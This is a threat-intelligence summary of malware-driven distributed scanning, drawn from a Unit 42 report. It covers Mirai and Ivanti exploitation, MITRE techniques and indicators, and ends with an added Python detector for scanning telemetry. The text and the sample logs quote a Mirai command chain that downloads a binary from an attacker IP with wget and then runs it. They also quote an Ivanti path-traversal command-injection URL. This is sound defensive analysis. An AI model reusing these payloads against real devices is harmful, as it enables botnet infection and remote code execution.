Keypoints
- Threat actors increasingly use infected hosts to perform distributed scanning rather than scanning directly from attacker infrastructure.
- Malware on compromised devices beacons to C2 domains, receives scan instructions, and issues high-volume HTTP requests to many destinations.
- Attackers embed previously unseen payload or C2 URLs inside exploit requests to evade vendor blocking and extend the time before payload/C2 detection.
- Mirai variants carried scanning payloads (e.g., skyljne.mips/mips), hosted on multiple IPs, and used wget/chmod/execute chains to install and run binaries.
- Ivanti vulnerabilities were exploited in chained attacks that used path traversal to bypass authentication and perform command injection, exfiltrating victim IPs via dnslog domains.
- Telemetry-based detection looks for unusually high request volumes and repeated benign-looking paths (e.g., guestaccess.aspx) to identify scanning activity.
MITRE Techniques
- [T1595] Active Scanning – Malware on compromised hosts initiates scanning requests to identify vulnerable targets (‘…the malware on the compromised device initiates scanning requests to various target domains.’)
- [T1190] Exploit Public-Facing Application – Attackers sent exploit requests targeting MOVEit and other CVEs to trigger remote code execution (‘…attempt to scan for and subsequently exploit the MOVEit vulnerability CVE-2023-34362.’)
- [T1105] Ingress Tool Transfer – Payloads were hosted on attacker-controlled URLs and downloaded/executed on targets using wget/chmod/execute sequences (‘…wget hxxp://103.110.33[.]164/mips; chmod 777 mips; ./mips’).
- [T1071] Application Layer Protocol – Compromised devices beacon to attacker-controlled C2 domains to receive scan instructions (‘…this malware beacons to attacker-controlled C2 domains for instructions.’)
- [T1190] Exploit Public-Facing Application – Attackers used path traversal to bypass authentication and trigger command injection on Ivanti endpoints (‘…/api/v1/totp/user-backup-code/../../license/keys-status;’).
Indicators of Compromise
- [IP addresses] Mirai hosting/C2 context – 45.66.230[.]32, 193.47.61[.]75, and 16 more IPs associated with Mirai payload hosting and C2.
- [File hash] Mirai sample – 23190d722ba3fe97d859bd9b086ff33a14ae9aecfc8a2c3427623f93de3d3b14 (SHA256) used to identify the Mirai variant.
- [Domains/URLs] Ivanti and payload delivery context – hxxp://45.130.22[.]219/ivanti.js, dnslog[.]store (used to collect victim IPs), and 137.220.130[.]2/doc.
- [File paths / payload names] Exploit/download patterns – bin/zhttpd/…wget…/mips (Mirai Zyxel exploit pattern), 103.245.236[.]188/skyljne.mips, and 103.110.33[.]164/mips.
Malware-driven scanning follows a simple operational procedure: an adversary compromises a host, the implanted malware beacons to attacker-controlled C2 infrastructure, and the C2 issues scan/exploit instructions. Infected devices then generate high-volume requests—often to many distinct destinations—using benign-looking paths (for example guestaccess.aspx tied to MOVEit scans) or exploit-specific URL patterns. This distributed scanning model helps attackers obscure origin, bypass geofencing, and scale scanning throughput beyond what a single attacker-controlled IP could achieve.
Attackers commonly embed fresh payload or C2 URLs directly inside exploit requests to reduce the chance of early blocking by security vendors. Observed Mirai behavior includes downloading architecture-specific binaries and executing them via command chains such as ‘bin/zhttpd/${ifs}cd${ifs}/tmp;${ifs}rm${ifs}-rf${ifs}*;${ifs}wget${ifs}hxxp://103.110.33[.]164/mips;${ifs}chmod${ifs}777${ifs}mips;${ifs}./mips${ifs}zyxel.selfrep;’ (change to /tmp, clear it, fetch the MIPS binary, make it executable, run it). A Mirai sample (SHA256: 23190d7…) connected to C2 at 193.47.61[.]75 and then performed scanning; other Mirai-hosting IPs include 45.66.230[.]32 and 103.110.33[.]164. These sequences demonstrate ingress tool transfer (download and execute) followed by propagation attempts.
Chained exploitation was also observed against Ivanti products: attackers used a path traversal GET to bypass an authentication prefix check and reach a command-injectable endpoint, e.g. ‘/api/v1/totp/user-backup-code/../../license/keys-status;<attacker_cmd>’. The injected command attempted to contact a dnslog domain (a0f0b2e6[.]dnslog[.]store) to capture victim IPs for follow-up activity. Detecting and blocking the initial scanning requests—by flagging anomalous request volumes, repeated benign-looking endpoints across many destinations, or exploit-specific URL patterns—provides the earliest opportunity to disrupt these infection and payload-delivery chains.
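As an added illustration of the telemetry-based detection described in the paragraphs above (this is example code written for this summary, not from the Unit 42 write-up), the following Python script runs three checks over constructed request telemetry: per-source request volume, one benign-looking path (guestaccess.aspx) repeated across many distinct destinations, and exploit-specific URL shapes matching the Ivanti traversal and the ${ifs}-separated wget/chmod chain quoted in the text. It assumes a hypothetical log format of `src_ip dst_host method path`; the thresholds, hostnames and documentation-range IPs in the sample are constructed for the example.

```python
"""Flag malware-driven scanning in HTTP request telemetry (added example, not
from the original write-up). Three checks mirror the detection points in the
text: per-source request volume, one benign-looking path repeated across many
destinations, and exploit-specific URL patterns."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample telemetry in a hypothetical "<src_ip> <dst_host> <method> <path>"
# format. IPs are from documentation ranges; hosts and paths are made up for the example.
SAMPLE_LOG = """\
203.0.113.10 site01.example GET /guestaccess.aspx
203.0.113.10 site02.example GET /guestaccess.aspx
203.0.113.10 site03.example GET /guestaccess.aspx
203.0.113.10 site04.example GET /guestaccess.aspx
203.0.113.10 site05.example GET /guestaccess.aspx
203.0.113.10 site06.example GET /guestaccess.aspx
203.0.113.10 site07.example GET /guestaccess.aspx
203.0.113.10 site08.example GET /guestaccess.aspx
198.51.100.7 vpn.example GET /api/v1/totp/user-backup-code/../../license/keys-status;id
198.51.100.9 router.example GET /bin/zhttpd/${ifs}cd${ifs}/tmp;${ifs}wget${ifs}http://192.0.2.1/mips;${ifs}chmod${ifs}777${ifs}mips;${ifs}./mips
192.0.2.55 site01.example GET /index.html
192.0.2.55 site01.example GET /guestaccess.aspx
192.0.2.55 site01.example POST /login
"""

# Signatures for the two exploit URL shapes quoted in the text: the Ivanti path
# traversal that reaches the keys-status endpoint with a trailing ';' command
# separator, and the Zyxel-style ${ifs}-separated wget/chmod download chain.
EXPLOIT_PATTERNS = {
    "ivanti_traversal_cmdinj": re.compile(r"/api/v1/.*?/\.\./.*?license/keys-status;", re.I),
    "zyxel_ifs_download_chain": re.compile(r"\$\{ifs\}.*\bwget\b.*\bchmod\b", re.I),
}


def parse_log(text):
    """Return (src, dst, method, path) tuples; paths are percent-decoded so
    encoded traversal or ${ifs} tokens are matched the same as plain ones."""
    events = []
    for line in text.splitlines():
        parts = line.strip().split(" ", 3)
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        src, dst, method, path = parts
        events.append((src, dst, method, unquote(path)))
    return events


def detect_scanning(events, min_requests=8, min_distinct_dst=5,
                    watch_paths=("/guestaccess.aspx",)):
    """Map src_ip -> list of reasons for sources that look like scanners."""
    per_src = defaultdict(list)
    for src, dst, _method, path in events:
        per_src[src].append((dst, path))
    findings = {}
    for src, reqs in per_src.items():
        reasons = []
        if len(reqs) >= min_requests:
            reasons.append(f"high_volume:{len(reqs)}")
        for wp in watch_paths:
            # the same benign path hitting many different hosts from one source
            dsts = {dst for dst, path in reqs if path == wp}
            if len(dsts) >= min_distinct_dst:
                reasons.append(f"repeated_path:{wp}:{len(dsts)}_destinations")
        if reasons:
            findings[src] = reasons
    return findings


def detect_exploit_patterns(events):
    """Return (src, dst, signature_name) for requests matching a known exploit shape."""
    hits = []
    for src, dst, _method, path in events:
        for name, rx in EXPLOIT_PATTERNS.items():
            if rx.search(path):
                hits.append((src, dst, name))
    return hits


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    for src, reasons in detect_scanning(evts).items():
        print(f"scanner candidate {src}: {', '.join(reasons)}")
    for src, dst, name in detect_exploit_patterns(evts):
        print(f"exploit pattern {name}: {src} -> {dst}")
```

Tune the thresholds against a baseline of normal traffic before alerting. Because the scanning is distributed across many infected devices, a single source may stay under the volume threshold; the repeated-path check is the more robust signal per source, and in practice the same aggregation should also be run per path across all sources within a time window so that a low-and-slow fleet still stands out.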
Read more: https://unit42.paloaltonetworks.com/malware-initiated-scanning-attacks/